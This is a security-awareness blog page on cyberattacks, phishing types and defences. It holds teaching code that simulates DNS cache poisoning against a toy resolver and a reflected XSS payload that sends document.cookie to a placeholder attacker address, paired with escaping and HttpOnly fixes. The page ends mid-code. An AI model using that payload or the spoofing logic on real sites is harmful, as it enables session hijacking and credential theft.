Showing posts with label Safe Banking.

Cyber Attack and Prevention Tips


A cyberattack is the deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyberattacks use malicious code to alter computer code, logic or data, with disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
A cyberattack is also known as a computer network attack (CNA).
Cyberattacks, together with the techniques they use and the consequences they cause, include the following:
  • Identity theft, fraud, extortion
  • Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
  • Stolen hardware, such as laptops or mobile devices
  • Denial-of-service and distributed denial-of-service attacks
  • Breach of access
  • Password sniffing
  • System infiltration
  • Website defacement
  • Private and public Web browser exploits
  • Instant messaging abuse
  • Intellectual property (IP) theft or unauthorized access
The Institute for Security Technology Studies at Dartmouth College researches and investigates cyberattack issues facing law enforcement investigations and focuses on the continuous development of IP tracing, data analysis, real-time interception and national data sharing.

Keep your computer current with the latest patches and updates.

One of the best ways to keep attackers away from your computer is to apply patches and other software fixes when they become available. By regularly updating your computer, you block attackers from being able to take advantage of software flaws (vulnerabilities) that they could otherwise use to break into your system. 

While keeping your computer up-to-date will not protect you from all attacks, it makes it much more difficult for hackers to gain access to your system, blocks many basic and automated attacks completely, and might be enough to discourage a less-determined attacker to look for a more vulnerable computer elsewhere. 

More recent versions of Microsoft Windows and other popular software can be configured to download and apply updates automatically so that you do not have to remember to check for the latest software. Taking advantage of "auto-update" features in your software is a great start toward keeping yourself safe online. 

Make sure your computer is configured securely.

Keep in mind that a newly purchased computer may not have the right level of security for you. When you are installing your computer at home, pay attention not just to making your new system function, but also focus on making it work securely. 

Configuring popular Internet applications such as your Web browser and email software is one of the most important areas to focus on. For example, settings in your Web browser such as Internet Explorer or Firefox will determine what happens when you visit Web sites on the Internet—the strongest security settings will give you the most control over what happens online but may also frustrate some people with a large number of questions ("This may not be safe, are you sure you want do this?") or the inability to do what they want to do. 

Choosing the right level of security and privacy depends on the individual using the computer. Oftentimes security and privacy settings can be properly configured without any sort of special expertise by simply using the "Help" feature of your software or reading the vendor's Web site. If you are uncomfortable configuring it yourself consult someone you know and trust for assistance or contact the vendor directly. 

Choose strong passwords and keep them safe.

Passwords are a fact of life on the Internet today—we use them for everything from ordering flowers and online banking to logging into our favorite airline Web site to see how many miles we have accumulated. The following tips can help make your online experiences secure: 
  • Selecting a password that cannot be easily guessed is the first step toward keeping passwords secure and away from the wrong hands. Strong passwords are long (eight characters is the bare minimum; twelve or more, or a multi-word passphrase, is much safer) and use a combination of letters, numbers and symbols (e.g., # $ % ! ?). Avoid using any of the following as your password: your login name, anything based on your personal information such as your last name, and words that can be found in the dictionary. Select especially strong, unique passwords for protecting activities like online banking.
  • Keep your passwords in a safe place, such as a password manager, and do not use the same password for more than one service: a password stolen from one site is routinely tried against others.
  • Change a password immediately if you notice anything suspicious about one of your online accounts or learn that the service has been breached; this limits the damage someone who has already gained access can do. Forcing a change on a fixed schedule (for example every 90 days) is no longer recommended by NIST, because it tends to produce predictable, weaker passwords; length, uniqueness and a second factor matter more.


Protect your computer with security software.

Several types of security software are necessary for basic online security. Security software essentials include firewall and antivirus programs. A firewall is usually your computer's first line of defense: it controls who and what can communicate with your computer online. You could think of a firewall as a sort of "policeman" that watches all the data attempting to flow in and out of your computer on the Internet, allowing communications that it knows are safe and blocking "bad" traffic such as attacks from ever reaching your computer. 

The next line of defense is often your antivirus software, which monitors online activities such as email messages and Web browsing and protects you from viruses, worms, Trojan horses and other types of malicious programs. More recent versions of antivirus programs, such as Norton AntiVirus, also protect against spyware and potentially unwanted programs such as adware. Having security software that gives you control over software you may not want and protects you from online threats is essential to staying safe on the Internet. Your antivirus and antispyware software should be configured to update itself, and it should do so every time you connect to the Internet. 

Integrated security suites, which combine firewall, antivirus and antispyware with other features such as antispam and parental controls, have become popular as they offer all the security software needed for online protection in a single package. Many people find using a security suite an attractive alternative to installing and configuring several different types of security software and keeping them all up to date. 

Protect your personal information.

Exercise caution when sharing personal information such as your name, home address, phone number, and email address online. To take advantage of many online services, you will inevitably have to provide personal information in order to handle billing and shipping of purchased goods. Since not divulging any personal information is rarely possible, the following list contains some advice for how to share personal information safely online: 
  • Keep an eye out for phony email messages. Things that indicate a message may be fraudulent are misspellings, poor grammar, odd phrasings, Web site addresses with strange extensions, Web site addresses that are entirely numbers where there are normally words, and anything else out of the ordinary. Additionally, phishing messages will often tell you that you have to act quickly to keep your account open, update your security, or urge you to provide information immediately or else something bad will happen. Don't take the bait.
  • Don't respond to email messages that ask for personal information. Legitimate companies will not use email messages to ask for your personal information. When in doubt, contact the company by phone or by typing the company's Web address into your Web browser yourself. Don't click on the links in these messages, as they may take you to fraudulent, malicious Web sites.
  • Steer clear of fraudulent Web sites used to steal personal information. When visiting a Web site, type the address (URL) directly into the Web browser rather than following a link within an email or instant message. Fraudsters often forge these links to make them look convincing. A shopping, banking or any other Web site where you enter sensitive information should have an "s" after the letters "http" (i.e. https://www.yourbank.com, not http://www.yourbank.com). The "s" stands for secure and should appear whenever you are asked to log in or provide other sensitive data; modern browsers also show a small lock icon in the address bar. Keep in mind what that lock does and does not tell you: it means the connection to the site named in the address bar is encrypted, not that the site is the one you intended. Phishing pages are routinely served over HTTPS too, so check the domain name itself, not just the lock.
  • Pay attention to privacy policies on Web sites and in software. It is important to understand how an organization might collect and use your personal information before you share it with them.
  • Guard your email address. Spammers and phishers sometimes send millions of messages to email addresses that may or may not exist in hopes of finding a potential victim. Responding to these messages or even downloading images ensures you will be added to their lists for more of the same messages in the future. Also be careful when posting your email address online in newsgroups, blogs or online communities.


Online offers that look too good to be true usually are.

The old saying "there's no such thing as a free lunch" still rings true today. Supposedly "free" software such as screen savers or smileys, secret investment tricks sure to make you untold fortunes, and contests that you've surprisingly won without entering are the enticing hooks used by companies to grab your attention. 

While you may not directly pay for the software or service with money, the free software or service you asked for may have been bundled with advertising software ("adware") that tracks your behavior and displays unwanted advertisements. You may have to divulge personal information or purchase something else in order to claim your supposed contest winnings. If an offer looks so good it's hard to believe, ask for someone else's opinion, read the fine print, or better still, simply ignore it. 

Review bank and credit card statements regularly.

The impact of identity theft and online crimes can be greatly reduced if you can catch it shortly after your data is stolen or when the first use of your information is attempted. One of the easiest ways to get the tip-off that something has gone wrong is by reviewing the monthly statements provided by your bank and credit card companies for anything out of the ordinary. 

Additionally, many banks and services use fraud prevention systems that flag unusual purchasing behavior (i.e. if you live in Texas and all of a sudden start buying refrigerators in Budapest). To confirm these out-of-the-ordinary purchases, they might call you and ask you to verify them. Don't take these calls lightly: this is your hint that something bad may have happened, and you should consider pursuing some of the activities mentioned in the area covering how to respond if you have become a victim. One caution: fraudsters also place calls pretending to be the bank's fraud department, so never give out a PIN, password or one-time code to a caller; if in doubt, hang up and call the number printed on your card. 
What is phishing

Phishing is a form of fraud in which the attacker tries to learn information such as login credentials or account information by masquerading as a reputable entity or person in email, IM or other communication channels.
Typically a victim receives a message that appears to have been sent by a known contact or organization. An attachment or links in the message may install malware on the user’s device or direct them to a malicious website set up to trick them into divulging personal and financial information, such as passwords, account IDs or credit card details. Phishing is a homophone of fishing, which involves using lures to catch fish.
Phishing is popular with cybercriminals, as it is far easier to trick someone into clicking a malicious link in a seemingly legitimate email than trying to break through a computer’s defenses. Although some phishing emails are poorly written and clearly fake, sophisticated cybercriminals employ the techniques of professional marketers to identify the most effective types of messages --  the phishing "hooks" that get the highest "open" or click through rate and the Facebook posts that generate the most likes. Phishing campaigns are often built around the year's major events, holidays and anniversaries, or take advantage of breaking news stories, both true and fictitious.
To make phishing messages look like they are genuinely from a well-known company, they include logos and other identifying information taken directly from that company's website. The malicious links within the body of the message are designed to make it appear that they go to the spoofed organization. The use of subdomains and misspelled URLs (typosquatting) are common tricks, as is homograph spoofing: URLs built from look-alike characters, typically letters from another alphabet such as a Cyrillic "а" in place of the Latin "a", so that the name reads exactly like a trusted domain. Some phishing pages use JavaScript to place a picture of a legitimate URL over the browser's address bar, and the URL shown when hovering over an embedded link can also be altered with JavaScript, so hovering is a useful but not conclusive check.
Spear phishing attacks are directed at specific individuals or companies, while incidents that specifically target senior executives within an organization are termed whaling attacks. Those preparing a spear phishing campaign research their victims in detail in order to create a more genuine message, as using information relevant or specific to a target increases the chances of the attack being successful. Phishers use social networking and other sources of information to gather background information about the victim’s personal history, their interests and activities. Names, job titles and email addresses of colleagues and key company employees are verified, as are vacations. This information is then used to craft a believable email. Targeted attacks and advanced persistent threats (APTs) typically start with a spear phishing email containing a malicious link or attachment.
A gateway email filter can trap many mass-targeted phishing emails, reducing the number that reach users' inboxes. Make sure your own mail domains publish the current email authentication standards, SPF, DKIM and DMARC (the successors of the older Sender ID and DomainKeys schemes): SPF lists the servers allowed to send for the domain, DKIM signs outgoing messages, and a DMARC policy tells receiving servers to quarantine or reject mail that fails both checks, which cuts out spoofed email claiming to come from you. A Web security gateway can provide another layer of defense by preventing users from reaching the target of a malicious link. These work by checking requested URLs against a constantly updated database of sites suspected of distributing malware.
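To show what "publishing SPF and DMARC" actually buys a receiving server, here is an added example (written for this page, not code from the article or from any mail product) of a minimal SPF evaluation and a DMARC alignment check. The DNS TXT records, domains and IP addresses are constructed for the illustration and held in a dictionary so the example runs offline; a real receiver would query DNS and would also verify the DKIM signature, which is out of scope here (the `dkim_domain` argument stands for the `d=` of a signature that already verified).

```python
import ipaddress

# Constructed stand-in for DNS TXT records (real code would query DNS).
TXT_RECORDS = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailhost.example -all",
    "_spf.mailhost.example": "v=spf1 ip4:198.51.100.10 ~all",
    "_dmarc.example.com": "v=DMARC1; p=reject; adkim=r; aspf=r",
    "phish.example": "v=spf1 ip4:203.0.113.0/24 -all",   # the attacker's own domain
}


def check_spf(domain, sender_ip, depth=0):
    """Evaluate domain's SPF record for sender_ip. Handles ip4/ip6/include and
    the all mechanism with +/-/~/? qualifiers; returns pass, fail, softfail,
    neutral, none (no record) or permerror (too many nested includes)."""
    if depth > 10:                          # RFC 7208 lookup limit
        return "permerror"
    record = TXT_RECORDS.get(domain, "")
    if not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        matched = False
        if term.startswith(("ip4:", "ip6:")):
            # An IPv6 address is simply 'not in' an IPv4 network, and vice versa.
            matched = ip in ipaddress.ip_network(term[4:], strict=False)
        elif term.startswith("include:"):
            matched = check_spf(term[8:], sender_ip, depth + 1) == "pass"
        elif term == "all":
            matched = True
        if matched:
            return {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}[qualifier]
    return "neutral"


def organizational_domain(host):
    """Crude eTLD+1 (last two labels): fine for .com, wrong for .co.uk."""
    return ".".join(host.lower().split(".")[-2:])


def _aligned(auth_domain, from_domain, mode):
    """DMARC identifier alignment: strict ('s') needs an exact match, relaxed
    ('r') only the same organisational domain."""
    if mode == "s":
        return auth_domain == from_domain
    return organizational_domain(auth_domain) == organizational_domain(from_domain)


def check_dmarc(header_from_domain, envelope_from_domain, sender_ip, dkim_domain=None):
    """Return (spf_result, dmarc_pass, policy). DMARC passes only when SPF or
    DKIM passes *and* the authenticated domain aligns with the visible From:
    domain, which is what stops a phisher who passes SPF for his own domain."""
    record = TXT_RECORDS.get("_dmarc." + header_from_domain, "")
    tags = dict(t.strip().split("=", 1) for t in record.split(";") if "=" in t)
    spf_result = check_spf(envelope_from_domain, sender_ip)
    spf_ok = spf_result == "pass" and _aligned(
        envelope_from_domain, header_from_domain, tags.get("aspf", "r"))
    dkim_ok = dkim_domain is not None and _aligned(
        dkim_domain, header_from_domain, tags.get("adkim", "r"))
    return spf_result, spf_ok or dkim_ok, tags.get("p", "none")
```

The interesting case is the last one a receiver sees in practice: a message with `From: someone@example.com` sent from the attacker's server with envelope sender `phish.example`. SPF passes (the attacker's own record authorises his own server), but the authenticated domain does not align with the From: domain, so DMARC fails and the `p=reject` policy tells the receiver to drop it.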
There are plenty of resources on the Internet that provide help in combating phishing. The Anti-Phishing Working Group Inc. and the federal government's OnGuardOnline.gov website both provide advice on how to spot, avoid and report phishing attacks. Interactive training aids such as Wombat Security Technologies' Anti-Phishing Training Suite or PhishMe can help teach employees how to avoid phishing traps, while sites like FraudWatch International and MillerSmiles publish the latest phishing email subject lines circulating on the Internet.
Six common types of phishing attack
At this year’s RSA Conference, Tripwire conducted a survey where it asked 200 security professionals to weigh in on the state of phishing attacks.
More than half (58 percent) of respondents stated their organizations had seen an increase in phishing attacks in the past year. Despite that increase, most companies didn’t feel prepared to protect themselves against phishing scams. Indeed, a slight majority (52 percent) stated they were “not confident” in their executives’ ability to successfully spot a phishing scam.
The growth of phishing attacks in both frequency and sophistication, as noted by Verizon in its 2016 Data Breach Investigations Report, poses a significant threat to all organizations. It’s important that all companies know how to spot some of the most common phishing scams if they are to protect their corporate information.
With that in mind, I will use a guide developed by CloudPages to discuss six common phishing attacks: deceptive phishing, spear phishing, CEO fraud, pharming, Dropbox phishing, and Google Docs phishing. I will then provide some useful tips on how organizations can protect themselves against these phishing scams.

1. DECEPTIVE PHISHING

The most common type of phishing scam, deceptive phishing refers to any attack by which fraudsters impersonate a legitimate company and attempt to steal people’s personal information or login credentials. Those emails frequently use threats and a sense of urgency to scare users into doing the attackers’ bidding.
For example, scammers posing as PayPal might send out an attack email instructing recipients to click on a link in order to rectify a discrepancy with their account. In actuality, the link leads to a fake PayPal login page that collects the user's login credentials and delivers them to the attackers.
The success of a deceptive phish hinges on how closely the attack email resembles a legitimate company’s official correspondence. As a result, users should inspect all URLs carefully to see if they redirect to an unknown website. They should also look out for generic salutations, grammar mistakes, and spelling errors scattered throughout the email.

2. SPEAR PHISHING

Not all phishing scams lack personalization – some use it quite heavily.
For instance, in spear phishing scams, fraudsters customize their attack emails with the target’s name, position, company, work phone number and other information in an attempt to trick the recipient into believing that they have a connection with the sender.
The goal is the same as deceptive phishing: lure the victim into clicking on a malicious URL or email attachment, so that they will hand over their personal data.
Spear-phishing is especially commonplace on social media sites like LinkedIn, where attackers can use multiple sources of information to craft a targeted attack email.
To protect against this type of scam, organizations should conduct ongoing employee security awareness training that, among other things, discourages users from publishing sensitive personal or corporate information on social media. Companies should also invest in solutions that are capable of analyzing inbound emails for known malicious links/email attachments.

3. CEO FRAUD

Spear phishers can target anyone in an organization, even top executives. That’s the logic behind a “whaling” attack, where fraudsters attempt to harpoon an executive and steal their login credentials.
In the event their attack proves successful, fraudsters can choose to conduct CEO fraud, the second phase of a business email compromise (BEC) scam where attackers impersonate an executive and abuse that individual’s email to authorize fraudulent wire transfers to a financial institution of their choice.
Whaling attacks work because executives often don’t participate in security awareness training with their employees. To counter that threat, as well as the risk of CEO fraud, all company personnel – including executives – should undergo ongoing security awareness training.
Organizations should also consider amending their financial policies so that no one can authorize a financial transaction on the strength of an email alone; a payment or change of bank details requested by email should be confirmed through a second channel, such as a phone call to a number already on file, before any money moves.

4. PHARMING

As users become more savvy to traditional phishing scams, some fraudsters abandon "baiting" their victims entirely. Instead they resort to pharming, which redirects users without any click: most often through domain name system (DNS) cache poisoning, but also by tampering with a home router's DNS settings or a computer's hosts file.
The Internet's naming system uses DNS servers to convert alphabetical website names, such as "www.microsoft.com", to the numerical IP addresses used for locating computer services and devices.
In a DNS cache poisoning attack, a pharmer feeds a resolver a forged answer so that it caches the wrong IP address for a website name. The attacker can then redirect users to a malicious website of their choice even if the victims typed the correct name.
To protect against pharming, organizations should encourage employees to enter login credentials only on HTTPS-protected sites and never to click through certificate warnings, since a pharmed site cannot present a valid certificate for the real domain name. Resolvers should validate DNSSEC and randomize source ports and transaction IDs, home and office routers should be patched and have their DNS settings checked, and antivirus software with current signatures should run on all corporate devices.
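To make the cache-poisoning mechanism concrete, here is a toy resolver cache, added as an example for this page (it is not code from the article, and it talks to no real DNS). The record names, addresses and the attacker's address 203.0.113.66 are constructed. The cache lets the usual anti-poisoning checks be switched on and off, so the same two attacks can be run against a naive resolver and a hardened one: a Kaminsky-style flood of forged answers that guesses the 16-bit transaction ID, and a correctly matched answer for the attacker's own name that smuggles in an extra record for a bank. Spoofing the upstream server's source address is assumed to be trivial, as it is over UDP, so that check alone is no protection.

```python
import random
from dataclasses import dataclass


@dataclass
class DnsAnswer:
    txid: int        # 16-bit transaction ID copied from the query
    dst_port: int    # UDP port the answer is sent to
    qname: str       # question section
    records: dict    # answer section, name -> IPv4 (constructed values)
    src_ip: str      # claimed source address; trivially spoofable over UDP


class ToyCache:
    """Stub-resolver cache with the anti-poisoning checks switchable."""

    def __init__(self, upstream_ip, random_port=True, bailiwick=True, seed=None):
        self.upstream_ip = upstream_ip
        self.random_port = random_port
        self.bailiwick = bailiwick
        self.rng = random.Random(seed)
        self.cache = {}            # name -> IP
        self.pending = {}          # (txid, port) -> qname awaiting an answer

    def send_query(self, qname):
        """Pick the txid and source port an answer must echo back."""
        txid = self.rng.randrange(1 << 16)
        port = self.rng.randrange(1024, 1 << 16) if self.random_port else 53
        self.pending[(txid, port)] = qname
        return txid, port

    def receive(self, ans):
        """Return the names cached from this answer (empty list = dropped)."""
        qname = self.pending.get((ans.txid, ans.dst_port))
        if qname is None or qname != ans.qname or ans.src_ip != self.upstream_ip:
            return []
        del self.pending[(ans.txid, ans.dst_port)]
        zone = ".".join(qname.split(".")[-2:])
        accepted = []
        for name, ip in ans.records.items():
            # Bailiwick rule: only cache names inside the zone we asked about.
            if self.bailiwick and not (name == zone or name.endswith("." + zone)):
                continue
            self.cache[name] = ip
            accepted.append(name)
        return accepted


def txid_flood(cache, qname, attacker_ip="203.0.113.66"):
    """Kaminsky-style forgery: the attacker spoofs the upstream's address,
    assumes the resolver still answers on port 53 and tries every 16-bit txid.
    Returns True if any forged answer was cached."""
    cache.send_query(qname)
    for txid in range(1 << 16):
        forged = DnsAnswer(txid, 53, qname, {qname: attacker_ip}, cache.upstream_ip)
        if cache.receive(forged):
            return True
    return False


def smuggled_record(cache):
    """A correctly matched answer for the attacker's own name that carries an
    extra, out-of-zone record for the bank. Returns the names that got cached."""
    txid, port = cache.send_query("cdn.attacker.example")
    ans = DnsAnswer(txid, port, "cdn.attacker.example",
                    {"cdn.attacker.example": "203.0.113.5",
                     "www.bank.example": "203.0.113.66"}, cache.upstream_ip)
    return cache.receive(ans)
```

With `random_port=False` the flood always lands, because 65,536 guesses cover the whole transaction-ID space; with source-port randomization the attacker would also have to guess the port, and the same flood never matches. The bailiwick check is what stops the second attack: the resolver keeps the record it asked for and discards the bank's record that rode along with it.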

5. DROPBOX PHISHING

While some phishers no longer bait their victims, others have specialized their attack emails according to an individual company or service.
Take Dropbox, for example. Millions of people use Dropbox every day to back up, access and share their files. It’s no wonder, therefore, that attackers would try to capitalize on the platform’s popularity by targeting users with phishing emails.
One attack campaign, for example, tried to lure users into entering their login credentials on a fake Dropbox sign-in page hosted on Dropbox itself.
To protect against Dropbox phishing attacks, users should consider implementing two-step verification (2SV) on their accounts. 

6. GOOGLE DOCS PHISHING

Fraudsters could choose to target Google Drive similar to the way they might prey upon Dropbox users.
Specifically, as Google Drive supports documents, spreadsheets, presentations, photos and even entire websites, phishers can abuse the service to create a web page that mimics the Google account log-in screen and harvests user credentials.
A group of attackers did just that back in July of 2015. To add insult to injury, not only did Google unknowingly host that fake login page, but a Google SSL certificate also protected the page with a secure connection.
Once again, users should consider implementing 2SV to protect themselves against this type of threat. Google offers it through SMS codes, the Google Authenticator app or a security key; SMS is the weakest of these, since codes can be intercepted or redirected by SIM swapping, so prefer an authenticator app or a security key.

CONCLUSION

Using the guide above, organizations will be able to more quickly spot some of the most common types of phishing attacks. But that doesn’t mean they will be able to spot each and every phish. On the contrary, phishing is constantly evolving to adopt new forms and techniques.
With that in mind, it’s imperative that organizations conduct security awareness training on an ongoing basis so that their employees and executives stay on top of emerging phishing attacks.

PHISHING ATTACKS WHAT IS A PHISHING ATTACK


Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers. It occurs when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message. The recipient is then tricked into clicking a malicious link, which can lead to the installation of malware, the freezing of the system as part of a ransomware attack or the revealing of sensitive information.
An attack can have devastating results. For individuals, this includes unauthorized purchases, the stealing of funds, or identity theft.
Moreover, phishing is often used to gain a foothold in corporate or governmental networks as a part of a larger attack, such as an advanced persistent threat (APT) event. In this latter scenario, employees are compromised in order to bypass security perimeters, distribute malware inside a closed environment, or gain privileged access to secured data.
An organization succumbing to such an attack typically sustains severe financial losses in addition to declining market share, reputation, and consumer trust. Depending on scope, a phishing attempt might escalate into a security incident from which a business will have a difficult time recovering.

PHISHING ATTACK EXAMPLES

The following illustrates a common phishing scam attempt:
  • A spoofed email ostensibly from myuniversity.edu is mass-distributed to as many faculty members as possible.
  • The email claims that the user’s password is about to expire. Instructions are given to go to myuniversity.edu/renewal to renew their password within 24 hours.
Several things can occur by clicking the link. For example:
  • The user is redirected to myuniversity.edurenewal.com, a bogus page appearing exactly like the real renewal page, where both new and existing passwords are requested. The attacker, monitoring the page, captures the original password and uses it to gain access to secured areas of the university network.
  • The user is sent to the actual password renewal page, but the link carries a script payload in one of its parameters, which the page reflects into its HTML without escaping (a reflected XSS attack). The script runs in the user's browser in the context of the real site and sends the user's session cookie to the attacker, who can then act as that user on the university network.
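The second branch is worth seeing in code. Below is an added example (not code from the article or from any real university site) of a renewal page that reflects a `user` parameter into its HTML, rendered once the vulnerable way and once with output encoding, plus a small emulation of what `document.cookie` shows a script when the session cookie is set with `HttpOnly`. The template, the parameter name, the payload and the attacker address 203.0.113.66 are all constructed for the illustration.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed template for the renewal page: the 'user' parameter is echoed back.
TEMPLATE = "<h1>Password renewal for {user}</h1><form method=post>...</form>"


def render_renewal_page(request_url, escape_output):
    """Render /renewal?user=... either reflecting the parameter raw (the
    vulnerable behaviour described above) or HTML-escaped (the fix)."""
    user = parse_qs(urlsplit(request_url).query).get("user", [""])[0]
    if escape_output:
        user = html.escape(user, quote=True)   # < > & " ' become entities
    return TEMPLATE.format(user=user)


def contains_live_script(page):
    """Crude detector: an unescaped <script> tag survived into the HTML."""
    return "<script" in page.lower()


def script_visible_cookies(set_cookie_headers):
    """Emulate document.cookie: script only sees cookies set without HttpOnly,
    so an HttpOnly session cookie cannot be read by the injected payload."""
    visible = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        if not any(p.lower() == "httponly" for p in parts[1:]):
            visible.append(parts[0])
    return "; ".join(visible)


# The phishing link: the genuine host, with a script payload in the reflected
# parameter that ships document.cookie to the attacker's server.
PAYLOAD = "<script>new Image().src='https://203.0.113.66/c?'+document.cookie</script>"
PHISH_URL = "https://myuniversity.edu/renewal?user=" + quote(PAYLOAD)
```

Two controls, both cheap: escape everything reflected into HTML (or use a template engine that does it by default), and mark the session cookie `HttpOnly` so that even a script that does run cannot read it. A Content-Security-Policy without `'unsafe-inline'` would block the inline script altogether.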
PHISHING TECHNIQUES

EMAIL PHISHING SCAMS

Email phishing is a numbers game. An attacker sending out thousands of fraudulent messages can net significant information and sums of money, even if only a small percentage of recipients fall for the scam. As seen above, there are some techniques attackers use to increase their success rates.
For one, they will go to great lengths in designing phishing messages to mimic actual emails from a spoofed organization. Using the same phrasing, typefaces, logos, and signatures makes the messages appear legitimate.
In addition, attackers will usually try to push users into action by creating a sense of urgency. For example, as previously shown, an email could threaten account expiration and place the recipient on a timer. Applying such pressure causes the user to be less diligent and more prone to error.
Lastly, links inside messages resemble their legitimate counterparts, but typically have a misspelled domain name or extra subdomains. In the above example, the myuniversity.edu/renewal URL was changed to myuniversity.edurenewal.com. Similarities between the two addresses offer the impression of a secure link, making the recipient less aware that an attack is taking place.
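The link tricks listed here, and in the earlier posts on this page (extra subdomains, glued-on or misspelled domains, raw IP addresses, homograph look-alikes, non-HTTPS login links, and link text that names one site while the href points at another), can all be checked mechanically. The following is an added example written for this page, not code from any of the articles or products mentioned: a URL inspector plus a small HTML link extractor run over a constructed copy of the renewal mail. The trusted-domain list is an assumption standing in for whatever domains an organisation actually owns, and the registrable-domain helper is deliberately crude (last two labels), which is wrong for suffixes like .co.uk.

```python
import ipaddress
import re
import unicodedata
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the domains this organisation's users actually trust (constructed).
TRUSTED_DOMAINS = ("myuniversity.edu", "paypal.com")


def registrable_domain(host):
    """Crude eTLD+1 (last two labels): fine for .com/.edu, wrong for .co.uk."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze_url(url):
    """Return human-readable warnings for one URL; an empty list means no red flag."""
    warnings = []
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    if not host:
        return ["no hostname"]
    if parts.scheme != "https":
        warnings.append("not HTTPS")
    try:
        ipaddress.ip_address(host)
        return warnings + ["host is a raw IP address"]
    except ValueError:
        pass
    if any(ord(c) > 127 for c in host):
        # Homograph trick: letters from other alphabets that look Latin.
        scripts = sorted({unicodedata.name(c, "?").split()[0] for c in host if c.isalpha()})
        warnings.append("non-ASCII hostname, scripts %s" % "/".join(scripts))
    elif "xn--" in host:
        warnings.append("punycode hostname (IDN in its encoded form)")
    reg = registrable_domain(host)
    if reg in TRUSTED_DOMAINS:
        return warnings
    for trusted in TRUSTED_DOMAINS:
        # Trusted name glued into another domain or used as a subdomain.
        if trusted.replace(".", "") in host.replace(".", ""):
            warnings.append("trusted name %s embedded in untrusted host %s" % (trusted, host))
            break
        if edit_distance(reg, trusted) <= 2:
            warnings.append("possible typosquat of %s: %s" % (trusted, reg))
            break
    return warnings


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs from an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([\w-]+(?:\.[\w-]+)+)", re.I)


def analyze_email_html(body):
    """Map each href to its warnings, adding one when the visible link text
    names a different domain than the real target."""
    collector = LinkCollector()
    collector.feed(body)
    findings = {}
    for text, href in collector.links:
        warnings = analyze_url(href)
        shown, real = DOMAIN_IN_TEXT.match(text), urlsplit(href).hostname
        if shown and real and registrable_domain(shown.group(1)) != registrable_domain(real):
            warnings.append("link text shows %s but points to %s" % (shown.group(1), real))
        findings[href] = warnings
    return findings


# Constructed sample body modelled on the renewal mail described above.
SAMPLE_MAIL = """<p>Your password expires in 24 hours. Renew it now:</p>
<a href="http://myuniversity.edurenewal.com/renewal">myuniversity.edu/renewal</a>
<a href="https://www.myuniversity.edu/it/help">IT help desk</a>
<a href="http://192.0.2.10/login">https://www.paypal.com/signin</a>"""
```

Run over the sample, the genuine help-desk link comes back clean, the renewal link is flagged three times (plain HTTP, a trusted name glued into an untrusted host, and link text that disagrees with the target), and the third link is a raw IP address dressed up as PayPal. The homograph branch reports which Unicode scripts are mixed in the hostname, which is the signal a mail gateway would act on.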

SPEAR PHISHING

Spear phishing targets a specific person or enterprise, as opposed to random application users. It's a more in-depth version of phishing that requires special knowledge about an organization, including its power structure.
An attack might play out as follows:
  • A perpetrator researches names of employees within an organization's marketing department and gains access to the latest project invoices.
  • Posing as the marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads, Updated invoice for Q3 campaigns. The text, style, and included logo duplicate the organization's standard email template.
  • A link in the email redirects to a password-protected internal document, which is in actuality a spoofed version of a stolen invoice.
  • The PM is requested to log in to view the document. The attacker steals his credentials, gaining full access to sensitive areas within the organization's network.
By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of an APT.

PHISHING PROTECTION

Phishing attack protection requires steps be taken by both users and enterprises.
For users, vigilance is key. A spoofed message often contains subtle mistakes that expose its true identity. These can include spelling mistakes or changes to domain names, as seen in the earlier URL example. Users should also stop and think about why they’re even receiving such an email.
For enterprises, a number of steps can be taken to mitigate both phishing and spear phishing attacks:
  • Two-factor authentication (2FA) is one of the most effective controls against phishing, as it adds an extra verification step when logging in to sensitive applications. 2FA relies on users having two things: something they know, such as a password and user name, and something they have, such as a smartphone or a security key. Even when an employee's password is phished, 2FA keeps it from being used on its own. One caveat: one-time codes from SMS or an authenticator app can still be relayed by a real-time phishing proxy that sits between the victim and the real site, so phishing-resistant methods such as FIDO2/WebAuthn security keys, which bind the login to the genuine site's origin, are the stronger choice.
  • In addition to using 2FA, organizations should enforce strict password management policies: employees should not be allowed to reuse a password across applications, and a password should be changed as soon as a compromise is suspected. Forcing routine rotation adds little against phishing, because a phished password is typically used within minutes of being captured.
  • Educational campaigns can also help diminish the threat of phishing attacks by reinforcing secure practices, such as not clicking on external email links.
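The "something they have" factor behind authenticator apps is a shared secret and a clock. Here is an added example (written for this page, not code from Imperva, Google or any authenticator app) of RFC 6238 time-based one-time passwords using only the standard library, with the server-side check that tolerates a step of clock skew and compares in constant time. The secret used is the RFC 6238 test vector; a real deployment generates a random secret per user, stores it server-side, and also rejects a code that has already been accepted once.

```python
import base64
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the big-endian 8-byte counter, then the
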